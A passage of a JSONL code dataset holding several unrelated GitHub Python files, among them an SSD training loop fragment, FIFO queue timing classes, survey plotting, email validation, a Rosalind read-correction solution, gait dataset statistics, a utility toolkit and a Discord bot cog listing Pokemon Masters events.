'train':\n res_q.put('train')\n continue\n\n img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch, epoch_num = input_data\n\n # ---教師ラベル確認用(画像の確認が不要な場合は以下14行をコメントアウト)----------------------------------\n # for b in range(0, len(conf_img_batch)):\n # font = cv.FONT_HERSHEY_SIMPLEX\n # for bx in range(len(gt_box_batch[b]) - 1, 0, -1):\n # p1 = int(gt_box_batch[b][bx][0] * common_params.insize)\n # p2 = int(gt_box_batch[b][bx][1] * common_params.insize)\n # p3 = int(gt_box_batch[b][bx][2] * common_params.insize)\n # p4 = int(gt_box_batch[b][bx][3] * common_params.insize)\n # cv.rectangle(conf_img_batch[b], (p1, p2), (p3, p4), (0, 255, 0), 2)\n # q1 = p1\n # q2 = p4\n # cv.rectangle(conf_img_batch[b], (q1, q2 - 25), (q1 + 25, q2), (0, 255, 0), -1)\n # cv.putText(conf_img_batch[b], 
str(cls_batch[b][bx]), (q1, q2 - 8), font, 0.6, (0, 0, 0), 1, cv.CV_AA)\n        #     cv.imshow('Augmentation', conf_img_batch[b])\n        #     cv.waitKey()\n        # ------------------------------------------------------------------------------------------\n\n        bat_s = len(img_batch)\n\n        ssd_model.cleargrads()\n\n        train_img = chainer.Variable(xp.array(img_batch))\n\n        # SSD net forward\n        Loc1, Cls1, Loc2, Cls2, Loc3, Cls3, Loc4, Cls4, Loc5, Cls5, Loc6, Cls6 = ssd_model(train_img)\n\n        # Concatenate the localization maps output by the network for layers 1-6\n        Loc = F.concat([Loc1, Loc2, Loc3, Loc4, Loc5, Loc6], axis = 0)\n\n        # Concatenate the confidence maps output by the network for layers 1-6\n        Cls = F.concat([Cls1, Cls2, Cls3, Cls4, Cls5, Cls6], axis = 0)\n\n        # Enable hard negative mining on every other epoch\n        if epoch_num % 2 == 0:\n            mining = True\n        else:\n            mining = False\n\n        # Compute the loss\n        loss = lossFunction(Loc, Cls, gt_box_batch, df_box_batch, idx_batch, cls_batch, bat_s, mining)\n        loss.backward()\n\n        optimizer.update()\n\n        res_q.put((float(loss.data), float(bat_s)))\n\n        del img_batch, gt_box_batch, df_box_batch, idx_batch, cls_batch, conf_img_batch\n\n        del train_img\n        del Loc1, Loc2, Loc3, Loc4, Loc5, Loc6\n        del Cls1, Cls2, Cls3, Cls4, Cls5, Cls6\n        del Loc, Cls\n\n\n\nfeeder = threading.Thread(target = feed_data)\nfeeder.daemon = True\nfeeder.start()\nlogger = threading.Thread(target = log_result)\nlogger.daemon = True\nlogger.start()\n\ntrain_loop()\nfeeder.join()\nlogger.join()\n\nfout.close()\nprint(\"\\nExit Training\\n\")\n","repo_name":"machine-perception-robotics-group/MT-DSSD","sub_path":"Train_SSD.py","file_name":"Train_SSD.py","file_ext":"py","file_size_in_byte":25698,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"15298720456","text":"from collections import deque\nfrom timeit import default_timer as timer\n\"\"\"First class, implemented with the deque module\"\"\"\nclass Fifo():\n    fifo_list = deque(maxlen=10)\n\n    def inserts(self, item):\n        self.fifo_list.append(item)\n\n    def past(self):\n        return print(self.fifo_list.popleft())\n\nstart_time = timer()\nr = Fifo()\nr.inserts(4)\nr.inserts('123')\nr.inserts(111)\nend_time = timer()\nprint(end_time - start_time)\nprint(r.fifo_list)\nr.past()\nprint(r.fifo_list)\nprint()\n\n\"\"\"Second and third classes, implemented with list methods (they are slower to process when the list holds many elements)\"\"\"\nclass SimplePop:\n    fifo_list = []\n    def inserts(self, item):\n        self.fifo_list.append(item)\n        if len(self.fifo_list) > 10:\n            self.fifo_list.pop(0)\n    def past(self):\n        return print(self.fifo_list.pop(0))\nstart_time = timer()\nw = SimplePop()\nw.inserts('1')\nw.inserts('2')\nw.inserts('3')\nend_time = timer()\nprint(end_time - start_time)\nprint(w.fifo_list)\nw.past()\nprint(w.fifo_list)\nprint()\nclass SimplePopTwo:\n    fifo_list = []\n    def inserts(self, item):\n        self.fifo_list.append(item)\n        if len(self.fifo_list) > 10:\n            self.fifo_list.reverse()\n            self.fifo_list.pop()\n            self.fifo_list.reverse()\n    def past(self):\n        self.fifo_list.reverse()\n        r = self.fifo_list.pop()\n        self.fifo_list.reverse()\n        return print(r)\nstart_time = timer()\ns = SimplePopTwo()\ns.inserts('1')\nfor i in range(15):\n    s.inserts(i)\nend_time = timer()\nprint(end_time - start_time)\nprint(s.fifo_list)\ns.past()\nprint(s.fifo_list)","repo_name":"ravshansher23/Lesta-Studio","sub_path":"Lesta Studio/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
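# A self-contained sketch of the point the Task2.py sample above demonstrates:
# deque.popleft() is O(1) while list.pop(0) is O(n), so the deque-based queue
# wins as the queue grows. Timings are illustrative and machine-dependent.
from timeit import timeit

setup = "from collections import deque; d = deque(range(10**5)); l = list(range(10**5))"
print("deque.popleft():", timeit("d.popleft()", setup=setup, number=10000))
print("list.pop(0):   ", timeit("l.pop(0)", setup=setup, number=10000))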
+{"seq_id":"29553665392","text":"import numpy as np # type: ignore\nimport matplotlib.pyplot as plt # type: ignore\nimport argparse\nimport json\nimport copy\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--data-file\", type=str, default=\"out/survey_results.json\",\n help=\"location of JSON file containing survey results\")\n\nargs = parser.parse_args()\n\nwith open(args.data_file, \"r\") as f:\n survey_j = json.load(f)\n\nmodel_j = survey_j[\"by_model\"]\nsample_j = survey_j[\"by_sample\"]\nxp_counts = survey_j[\"xp_counts\"]\n\nxp_idxs = np.arange(4)\n\ndef standard_error(npa):\n return np.std(npa, ddof=1) / np.sqrt(np.size(npa))\n\ndef ninetyfive_confidence(npa):\n return standard_error(npa) * 1.96\n\ndef coherency_stats(breakdown):\n points = [0.0] * breakdown[0] + [0.5] * breakdown[1] + [1.0] * breakdown[2]\n cdat = np.array(points)\n mean = np.mean(cdat)\n err = standard_error(cdat)\n return mean, err\n\ndef weighted_stats(human_confidences, comp_confidences):\n points = []\n for idx,amt in enumerate([0.0,0.25,0.5,0.75,1.0]):\n points += [amt]*human_confidences[idx]\n points += [-amt]*comp_confidences[idx]\n wdat = np.array(points)\n mean = np.mean(wdat)\n err = standard_error(wdat)\n return mean,err\n\ndef human_stats(comp_count, human_count):\n points = [-1.0] * comp_count + [1.0] * human_count\n hdat = np.array(points)\n mean = np.mean(hdat)\n err = standard_error(hdat)\n return mean, err\n\nclass BarSet():\n def __init__(self):\n self.means = []\n self.errors = []\n\n def add_point(self, mean, error):\n self.means.append(mean)\n self.errors.append(error)\n\nmodel_proto = {\n \"coherency\" : BarSet(),\n \"human\" : BarSet(),\n \"weighted\" : BarSet()\n}\n\nper_model = {\n \"MVS\" : copy.deepcopy(model_proto),\n \"RNN\" : copy.deepcopy(model_proto),\n \"Bach\" : copy.deepcopy(model_proto)\n}\n\nmodel_names = [\"MVS\", \"RNN\", \"Bach\"]\n\nnum_xps = 4\n\nfor model in model_names:\n total_coherencies = np.array([0]*3)\n total_hvals = np.array([0,0])\n total_human_confs = np.array([0]*5)\n total_comp_confs = np.array([0]*5)\n\n model_dat = per_model[model]\n\n for xp in range(4):\n counts = model_j[model][xp]\n coherency_counts = counts[\"coherency_breakdown\"]\n model_dat[\"coherency\"].add_point(*coherency_stats(coherency_counts))\n\n hcounts = [counts[\"comp_count\"], counts[\"human_count\"]]\n model_dat[\"human\"].add_point(*human_stats(*hcounts))\n\n confidences = [counts[\"human_confidences\"], counts[\"comp_confidences\"]]\n model_dat[\"weighted\"].add_point(*weighted_stats(*confidences))\n\n total_coherencies += np.array(coherency_counts)\n total_hvals += np.array(hcounts)\n total_human_confs += np.array(confidences[0])\n total_comp_confs += np.array(confidences[1])\n\n model_dat[\"coherency\"].add_point(*coherency_stats(total_coherencies))\n model_dat[\"human\"].add_point(*human_stats(*total_hvals))\n model_dat[\"weighted\"].add_point(*weighted_stats(total_human_confs,\n total_comp_confs))\n\nidxs = np.arange(num_xps+1)\nwidth = 0.2\nthe_capsize = 4\n\nxp_labels = [\"Novice\", \"Intermediate\", \"Advanced\", \"Expert\", \"Overall\"]\nmodel_colours = ['g','b','r']\n\n# coherency plot\nplt.figure(1)\nplt.title(\"Mean coherency rating by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n cdat = per_model[model][\"coherency\"]\n bars = plt.bar(idxs + width*idx, cdat.means, width, color=model_colours[idx],\n yerr=cdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, 
model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Coherency\")\nplt.xticks(idxs, xp_labels)\nax = plt.gca()\nax.set_ylim([0.0,1.0])\n\n# turing-test plot\nplt.figure(2)\nplt.title(\"Mean human classification rate by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n hdat = per_model[model][\"human\"]\n bars = plt.bar(idxs + width*idx, hdat.means, width, color=model_colours[idx],\n yerr=hdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Human/computer classification (±1)\")\nplt.xticks(idxs, xp_labels)\nplt.axhline(y=0, color='k') # show y=0\n\n# weighted turing-test plot\nplt.figure(3)\nplt.title(\"Mean confidence-weighted classification by model and experience\")\n\nmodel_bars = []\nfor idx,model in enumerate(model_names):\n wdat = per_model[model][\"weighted\"]\n bars = plt.bar(idxs + width*idx, wdat.means, width, color=model_colours[idx],\n yerr=wdat.errors, capsize=the_capsize)\n model_bars.append(bars[0])\n\nplt.legend(model_bars, model_names)\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Weighted human/computer classification (±1)\")\nplt.xticks(idxs, xp_labels)\nplt.axhline(y=0, color='k')\nax = plt.gca()\nax.set_ylim([-0.45,0.7])\n\n# show response/experiecne distribution\nplt.figure(4)\nplt.title(\"Distribution of survey responses by experience\")\nplt.xlabel(\"Experience\")\nplt.ylabel(\"Responses\")\nplt.bar(idxs[0:4], xp_counts, width*2, color='b')\nplt.xticks(idxs[0:4], xp_labels[0:4])\nplt.show()\n\n","repo_name":"alexcoplan/p2proj","sub_path":"src/script/human_plots.py","file_name":"human_plots.py","file_ext":"py","file_size_in_byte":4907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17021213720","text":"import re\n\n\ndef email_validate():\n with open('emails.txt', 'r') as file:\n new = file.readlines()\n for each in new:\n # print(each, end='')\n regex = re.fullmatch(r'^[a-zA-Z]\\w+@(gmail|hotmail|yahoo)\\.com', each[:-1])\n if regex is None:\n print(f\"{each} is invalid mail\")\n with open('invalid_mail.txt', 'a') as file1:\n file1.write(each)\n\n else:\n print(f'{each} is valid')\n with open('valid_mail.txt', 'a') as file1:\n file1.write(each)\n\n\n # if pattern is None:\n # with open('')\n\n\nemail_validate()\n","repo_name":"jisshub/python-django-training","sub_path":"code-snippets/email_validation_storing_to_file.py","file_name":"email_validation_storing_to_file.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10981609582","text":"# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/main/LICENSE\n\nimport argparse\nimport sys\n\nif sys.version_info < (3, 9):\n import importlib_resources\nelse:\n import importlib.resources as importlib_resources\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(\n description=\"Print out compilation arguments to use Awkward Array as a C++ dependency\"\n )\n argparser.add_argument(\n \"--cflags\",\n action=\"store_true\",\n help=\"output compiler flags and Awkward include path\",\n )\n argparser.add_argument(\n \"--cflags-only-I\", action=\"store_true\", help=\"output Awkward include path\"\n )\n argparser.add_argument(\n \"--incdir\", action=\"store_true\", help=\"output Awkward include directory name\"\n )\n\n # only used in validating the arguments\n args = argparser.parse_args()\n\n output = []\n 
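    # The two statements below use the importlib.resources "traversable" API:
    # files() addresses a directory shipped inside the package, and as_file()
    # guarantees a real filesystem path for it while the context is open (for
    # zipped installs it may extract to a temporary directory). A minimal
    # sketch of the pattern, reusing this script's own names (defined here
    # for illustration only, never called):
    def _as_file_sketch():
        ref = importlib_resources.files("awkward") / "src" / "cpp-headers"
        with importlib_resources.as_file(ref) as incdir_path:
            return str(incdir_path)  # the path is only guaranteed valid inside the with-block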
incdir_ref = importlib_resources.files(\"awkward\") / \"src\" / \"cpp-headers\"\n with importlib_resources.as_file(incdir_ref) as incdir:\n # loop over original sys.argv to get optional arguments in order\n for arg in sys.argv:\n if arg == \"--cflags\":\n output.append(f\"-std=c++17 -I{incdir}\")\n\n if arg == \"--cflags-only-I\":\n output.append(f\"-I{incdir}\")\n\n if arg == \"--incdir\":\n output.append(str(incdir))\n\n print(\" \".join(output)) # noqa: T201\n","repo_name":"Laurits7/awkward","sub_path":"src/awkward/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"14832963279","text":"from __future__ import annotations\n\nfrom typing import Dict\n\nfrom torch import _C\n\n\nclass ExportTypes:\n r\"\"\"Specifies how the ONNX model is stored.\"\"\"\n\n PROTOBUF_FILE = \"Saves model in the specified protobuf file.\"\n ZIP_ARCHIVE = \"Saves model in the specified ZIP file (uncompressed).\"\n COMPRESSED_ZIP_ARCHIVE = \"Saves model in the specified ZIP file (compressed).\"\n DIRECTORY = \"Saves model in the specified folder.\"\n\n\nclass SymbolicContext:\n \"\"\"Extra context for symbolic functions.\n\n Args:\n params_dict (Dict[str, _C.IValue]): Mapping from graph initializer name to IValue.\n env (Dict[_C.Value, _C.Value]): Mapping from Torch domain graph Value to ONNX domain graph Value.\n cur_node (_C.Node): Current node being converted to ONNX domain.\n onnx_block (_C.Block): Current ONNX block that converted nodes are being appended to.\n \"\"\"\n\n def __init__(\n self,\n params_dict: Dict[str, _C.IValue],\n env: dict,\n cur_node: _C.Node,\n onnx_block: _C.Block,\n ):\n self.params_dict: Dict[str, _C.IValue] = params_dict\n self.env: Dict[_C.Value, _C.Value] = env\n # Current node that is being converted.\n self.cur_node: _C.Node = cur_node\n # Current onnx block that converted nodes are being appended to.\n self.onnx_block: _C.Block = onnx_block\n","repo_name":"pytorch/pytorch","sub_path":"torch/onnx/_exporter_states.py","file_name":"_exporter_states.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"34742064663","text":"from Bio import SeqIO\ncTable = {'A':'T','G':'C','C':'G','T':'A'}\n\ndef getReverseComplement(kmer):\n\trc = \"\"\n\tfor c in kmer[::-1]:\n\t\trc += cTable[c]\n\n\treturn rc\n\ndef getHammingDistance(s1, s2):\n\tdiff = 0\n\tfor c1,c2 in zip(s1,s2):\n\t\tif c1 != c2:\n\t\t\tdiff += 1\n\n\treturn diff\n\ndef getCorrectSequence(seq, correct_reads):\n\tfor cseq in correct_reads:\n\t\tdist = getHammingDistance(seq, cseq)\n\t\tif dist == 1:\n\t\t\treturn cseq\n\n\ninput_file = open(\"rosalind_corr.txt\",'r')\t\t\nsequences = SeqIO.parse(input_file,'fasta')\nreads = []\nfor fasta_seq in sequences:\n\treads.append(str(fasta_seq.seq))\n\ncorrect_seq = set()\nincorrect_seq = set()\nfor read in reads:\n\tif reads.count(read) > 1:\n\t\tcorrect_seq.add(read)\n\telse:\n\t\treverse = getReverseComplement(read)\n\t\tif reads.count(reverse) > 0:\n\t\t\tcorrect_seq.add(read)\n\t\telse:\n\t\t\tincorrect_seq.add(read)\n\ncorrect_seq_rc = set()\nfor seq in correct_seq:\n\tcorrect_seq_rc.add(getReverseComplement(seq))\n\ncorrect_seq.update(correct_seq_rc)\n\nfor seq in incorrect_seq:\n\tcorrect = getCorrectSequence(seq, 
correct_seq)\n\tprint(seq+\"->\"+correct)\n\t","repo_name":"raomanus/rosalind","sub_path":"corr.py","file_name":"corr.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13532931919","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport sys\nimport csv\n\nfrom util.const import TEMP_DIR, IDNET_BASE_FOLDER, ZJU_BASE_FOLDER, TIME_CONV\n\n\nfreq_all = {}\n\n\n# create a csv with basic statistics of IDNet dataset\ndef IDNet_statistics(path, filename):\n csv_file = open(TEMP_DIR+'/'+filename, mode='w')\n csv_file.write('file, numsamples, mean_dt, std_dt, fs, total_time (min)\\n')\n dataset_total_time = 0\n \n users_file = open(TEMP_DIR+'/'+'idnet_users.csv', mode='w')\n users_file.write('user, time\\n')\n fs_list = []\n users = {}\n ax_min = 1000\n ax_max = -100\n ay_min = 1000\n ay_max = -100\n az_min = 1000\n az_max = -100\n \n for file in os.listdir(path):\n current = os.path.join(path, file)\n if os.path.isdir(current):\n filename = current+'/'+file +'_accelerometer.log'\n df = pd.read_csv(filename, delimiter='\\t')\n \n x = df['accelerometer_x_data']\n min_value = min(x)\n if( min_value < ax_min ):\n ax_min = min_value\n max_value = max(x)\n if( max_value > ax_max ):\n ax_max = max_value\n\n\n y = df['accelerometer_y_data']\n min_value = min(y)\n if( min_value < ay_min ):\n ay_min = min_value\n max_value = max(y)\n if( max_value > ay_max ):\n ay_max = max_value\n \n z = df['accelerometer_z_data'] \n min_value = min(z)\n if( min_value < az_min ):\n az_min = min_value\n max_value = max(z)\n if( max_value > az_max ):\n az_max = max_value\n\n t = df['accelerometer_timestamp']\t\n dt= np.diff(t)\n mean_t = np.mean(dt)\n std_t = np.std(dt)\n #accelerometer_x_data\taccelerometer_y_data\taccelerometer_z_data\n linecounter = df.shape[0] \n fs = 1 / (mean_t/ TIME_CONV )\n fs_list.append(fs)\n total_time = (t[t.size-1] - t[ 0 ]) /(60 * TIME_CONV) \n dataset_total_time = dataset_total_time + total_time\n line = file+', '+str(linecounter)+', '+str(mean_t)+', '+str(std_t)+', '+str(fs)+', '+str(total_time)\n print(line)\n csv_file.write(line+\"\\n\")\n username = file[0:4]\n time = users.get(username)\n if time == None:\n users[username] = total_time\n else:\n users[username] = time + total_time\n\n\n csv_file.close()\n print('Sampling rate - MIN: '+ str(np.min(fs_list))+' MAX: '+ str(np.max(fs_list)) +' MEAN: '+str(np.mean(fs_list))+' STD: '+ str(np.std(fs_list)))\n print('IDNet total time: '+ str(dataset_total_time/60)+' hours')\n \n for (key, value) in users.items() :\n users_file.write(key + \", \" + str(value)+'\\n' )\n users_file.close()\n print(\"ax_min: \"+str(ax_min)+\" ax_max: \"+str(ax_max))\n print(\"ay_min: \"+str(ay_min)+\" ay_max: \"+str(ay_max))\n print(\"az_min: \"+str(az_min)+\" az_max: \"+str(az_max))\n \n\n\n# create a csv with basic statistics of ZJU-GaiAcc dataset\n# you have to run for a given session\ndef ZJU_session_statistics(basepath, sessiondir, numusers, output_file):\n # frequencies of cycle lengths\n freq = {}\n max_global = 0\n csv_file = open(TEMP_DIR+'/'+output_file, mode='w')\n csv_file.write('file, total_time (min)\\n')\n path = basepath + '/' + sessiondir\n print(path)\n session_time = 0\n for file in os.listdir(path):\n current = os.path.join(path, file)\n if os.path.isdir(current):\n user_time = 0\n for i in range(1,7):\n filename = current+'/rec_'+str(i)+'/cycles.txt'\n df = pd.read_csv(filename, header = None, 
delimiter=',')\n data = df.values\n n = data[-1].shape[0]\n x = data[ -1]\n dx = np.diff(x)\n max_recording = max(dx)\n if max_recording > max_global:\n max_global = max_recording\n for item in dx: \n if (item in freq): \n freq[item] += 1\n else: \n freq[item] = 1\n total_time = x[n-1]\n user_time = user_time + total_time/6000\n line = file + ', ' + str(user_time)\n csv_file.write(line+\"\\n\")\n session_time = session_time + user_time\n csv_file.close()\n print(sessiondir + ': ' + str(session_time)+' minutes')\n print(\"Max samples/cycle: \" + str(max_global))\n plot_histogram( freq, sessiondir )\n freq_all.update( freq )\n return session_time\n\n\ndef plot_histogram( freq, sessiondir ):\n plt.bar(list(freq.keys()), freq.values(), color='g')\n plt.xlabel('Cycle length')\n plt.ylabel('Frequency')\n plt.title('Histogram of cycle lengths '+sessiondir)\n\n k = np.array(list(freq.keys()))\n v = np.array(list(freq.values()))\n\n # Iterating over values \n sum_less = 0\n sum_all = 0\n for cycle, cycle_length in freq.items(): \n sum_all = sum_all + cycle_length\n if( cycle > 128 ):\n print(cycle, \":\", cycle_length)\n sum_less = sum_less + cycle_length \n print(str(sum_less) + \" / \" + str(sum_all))\n avg_cycle_length = np.dot(k, v)/np.sum(v)\n print(\"Average cycle length: \"+str(avg_cycle_length))\n print(\"Median cycle length: \"+str(np.median(k)))\n plt.grid(True)\n plt.show()\n\n\ndef main_statistics():\n # path = IDNET_BASE_FOLDER\n # print(path)\n # IDNet_statistics(path, 'idnet_statistics.csv')\n\n \n path = ZJU_BASE_FOLDER\n t0 = ZJU_session_statistics(path, 'session_0', 22, 'zju_session0.csv')\n t1 = ZJU_session_statistics(path, 'session_1', 153, 'zju_session1.csv')\n t2 = ZJU_session_statistics(path, 'session_2', 153, 'zju_session2.csv')\n print('Total time: '+ str((t0+t1+t2)/60)+' hours')\n\n plot_histogram( freq_all, \" - ZJUGaitAccel\" )\n\n\n\n\n\n ","repo_name":"margitantal68/featuregait","sub_path":"util/statistics.py","file_name":"statistics.py","file_ext":"py","file_size_in_byte":6040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"16216185484","text":"# -*- coding: utf-8 -*-\n##################################################################\n# By Kyan\n##################################################################\nimport os\nimport sys\nimport time\nimport getpass\nimport subprocess\nimport shlex\nimport urllib.request\nimport hashlib\nimport json\nimport io\nimport consoleiotools as cit\nfrom functools import wraps\n\n\nclass KyanToolKit(object):\n @property\n def version(self):\n return '5.1.2'\n\n def __init__(self, trace_file=\"trace.xml\"):\n self.trace_file = trace_file\n\n def __del__(self):\n pass\n\n# -Decorators-----------------------------------------------------\n def inTrace(self, func: callable): # decorator\n \"\"\"将被修饰函数的进入和退出写入日志\"\"\"\n @wraps(func)\n def call(*args, **kwargs):\n self.TRACE(\"Enter \" + func.__qualname__ + \"()\")\n result = func(*args, **kwargs)\n self.TRACE(\"Leave \" + func.__qualname__ + \"()\")\n return result\n return call\n\n# -Text Process---------------------------------------------------\n @classmethod\n def banner(cls, content_=\"Well Come\"):\n '生成占3行的字符串'\n # char def\n sp_char = \"#\"\n # length calc\n itsays = content_.strip()\n effective_length = int(len(itsays))\n # gen contents\n side_space = ' ' * int(effective_length * ((1 - 0.618) / 0.618) / 2)\n content_line = sp_char + side_space + itsays + side_space + sp_char\n content_line_length = 
len(content_line)\n banner_border = sp_char * content_line_length\n return banner_border + '\\n' + content_line + '\\n' + banner_border\n\n @classmethod\n def md5(cls, words=\"\"):\n if type(words) != bytes: # md5的输入必须为bytes类型\n words = str(words).encode()\n return hashlib.md5(words).hexdigest()\n\n# -Image Process--------------------------------------------------\n @staticmethod\n def imageToColor(url: str, scale=200, mode='rgb'):\n '将 url 指向的图片提纯为一个颜色'\n from PIL import Image\n import colorsys\n if url:\n response = urllib.request.urlopen(url)\n img_buffer = io.BytesIO(response.read())\n img = Image.open(img_buffer)\n img = img.convert('RGBA')\n img.thumbnail((scale, scale))\n statistics = {'r': 0, 'g': 0, 'b': 0, 'coef': 0}\n for cnt, (r, g, b, a) in img.getcolors(img.size[0] * img.size[1]):\n hsv = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)\n saturation = hsv[1] * 255\n coefficient = (saturation * cnt * a) + 0.01 # 避免出现 0\n statistics['r'] += coefficient * r\n statistics['g'] += coefficient * g\n statistics['b'] += coefficient * b\n statistics['coef'] += coefficient\n color = (\n int(statistics['r'] / statistics['coef']),\n int(statistics['g'] / statistics['coef']),\n int(statistics['b'] / statistics['coef'])\n )\n if mode.lower() == 'rgb':\n return color\n elif mode.lower() == 'hex':\n return \"#%0.2X%0.2X%0.2X\" % color\n else:\n return color\n else:\n return False\n\n# -System Fucntions-----------------------------------------------\n @classmethod\n def clearScreen(cls):\n \"\"\"清屏\"\"\"\n if \"win32\" in sys.platform:\n os.system('cls')\n elif \"linux\" in sys.platform:\n os.system('clear')\n elif 'darwin' in sys.platform:\n os.system('clear')\n else:\n cit.err(\"No clearScreen for \" + sys.platform)\n\n @classmethod\n @cit.as_session('Run Command')\n def runCmd(cls, cmd):\n \"\"\"run command and show if success or failed\n\n Args:\n cmd: string\n Returns:\n bool: if this command run successfully\n \"\"\"\n cit.echo(cmd, \"command\")\n result = os.system(cmd)\n cls.checkResult(result)\n\n @classmethod\n @cit.as_session('Read Command')\n def readCmd(cls, cmd):\n \"\"\"run command and return the str format stdout\n\n Args:\n cmd: string\n Returns:\n str: what the command's echo\n \"\"\"\n args = shlex.split(cmd)\n proc = subprocess.Popen(args, stdout=subprocess.PIPE)\n (proc_stdout, proc_stderr) = proc.communicate(input=None) # proc_stdin\n return proc_stdout.decode() # stdout & stderr is in bytes format\n\n# -Get Information------------------------------------------------\n @classmethod\n def ajax(cls, url, param={}, method='get'):\n \"\"\"Get info by ajax\n\n Args:\n url: string\n Returns:\n dict: json decoded into a dict\n \"\"\"\n param = urllib.parse.urlencode(param)\n if method.lower() == 'get':\n req = urllib.request.Request(url + '?' 
+ param)\n elif method.lower() == 'post':\n param = param.encode('utf-8')\n req = urllib.request.Request(url, data=param)\n else:\n raise Exception(\"invalid method '{}' (GET/POST)\".format(method))\n rsp = urllib.request.urlopen(req)\n if rsp:\n rsp_json = rsp.read().decode('utf-8')\n rsp_dict = json.loads(rsp_json)\n return rsp_dict\n return None\n\n @classmethod\n def readFile(cls, filepath):\n for mode in (\"utf-8\", 'gbk', 'cp1252', 'windows-1252', 'latin-1'):\n try:\n with open(filepath, mode='r', encoding=mode) as f:\n content = f.read()\n cit.info('以 {} 格式打开文件'.format(mode))\n return content\n except UnicodeDecodeError:\n cit.warn('打开文件:尝试 {} 格式失败'.format(mode))\n return None\n\n\n# -Pre-checks---------------------------------------------------\n @classmethod\n @cit.as_session(\"Platform Check\")\n def needPlatform(cls, expect_platform: str):\n cit.info(\"Need: \" + expect_platform)\n cit.info(\"Current: \" + sys.platform)\n if expect_platform not in sys.platform:\n cit.bye(\"Platform Check Failed\")\n\n @classmethod\n @cit.as_session(\"User Check\")\n def needUser(cls, expect_user: str):\n cit.info(\"Need: \" + expect_user)\n cit.info(\"Current: \" + cls.getUser())\n if cls.getUser() != expect_user:\n cit.bye(\"User Check Failed\")\n\n# -Debug---------------------------------------------------------\n def TRACE(self, input_: str, trace_type='INFO'):\n trace_content = ''.join(input_)\n current_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n current_function = sys._getframe().f_back\n current_function_name = current_function.f_code.co_name\n current_line = current_function.f_code.co_firstlineno\n current_filename = current_function.f_code.co_filename\n trace_header = '\\n<{type} FILE=\"{file}\" LINE=\"{line}\" TIME=\"{time}\" FUNC=\"{func}()\">\\n'.format(\n type=trace_type, file=current_filename, line=str(current_line),\n time=current_time, func=current_function_name\n )\n with open(self.trace_file, 'a') as trace:\n trace.write(trace_header + trace_content + \"\\n\\n\")\n\n\n# -Internal Uses-------------------------------------------------\n @classmethod\n def checkResult(cls, result: bool):\n if 0 == result:\n cit.echo(\"Done\", \"result\")\n else:\n cit.echo(\"Failed\", \"result\")\n\n @classmethod\n def getUser(cls):\n return getpass.getuser()\n","repo_name":"Python3pkg/PyKyanToolKit","sub_path":"KyanToolKit.py","file_name":"KyanToolKit.py","file_ext":"py","file_size_in_byte":7766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10217143772","text":"from discord.ext import commands\nfrom datetime import datetime\nimport discord\n\nclass PEvents(commands.Cog):\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.command(name=\"pevent\", description = 'Displays upcoming Pokemon Masters events')\n async def pevent(self, ctx: commands.Context):\n # Get current time as yyyy-mm-dd hh:mm:ss UTC\n now = datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S UTC')\n\n # Open rumors.txt and read it into a list\n with open('rumors.txt', 'r', encoding='utf-8') as f:\n rumors = f.readlines()\n\n # Remove newline characters in rumors\n for i in range(len(rumors)):\n rumors[i] = rumors[i].strip()\n\n embed = discord.Embed(title=\"Upcoming Pokemon Masters Events:\", color=0xFF0000, timestamp=datetime.utcnow())\n embed.set_author(name = '')\n\n # If index % 5 == 2, check if the event is in the future. 
If it is, add it to the embed.\n        count = 0\n        for i in range(len(rumors)):\n            if i % 5 == 2:\n                if now < rumors[i]:\n                    # Do not add if contains scout or Scout\n                    if 'scout' not in rumors[i-2] and 'Scout' not in rumors[i-2]:\n                        # Get time difference between now and the event\n                        time_diff = datetime.strptime(rumors[i], '%Y-%m-%d %H:%M:%S UTC') - datetime.strptime(now, '%Y-%m-%d %H:%M:%S UTC')\n                        embed.add_field(name=rumors[i-2], value='Starting: ' + rumors[i] + '\\nIn: ' + str(time_diff))\n                        count += 1\n\n        # If no events are found, add a message to the embed\n        if count == 0:\n            embed.add_field(name=\"No upcoming events found\", value=\"Check https://github.com/pm-events/pm-events.github.io/ if there are any new leaks\")\n\n        await ctx.send(embed=embed)\n\ndef setup(bot: commands.Bot):\n    bot.add_cog(PEvents(bot))","repo_name":"tonycai777/DiscordBot","sub_path":"pevents.py","file_name":"pevents.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 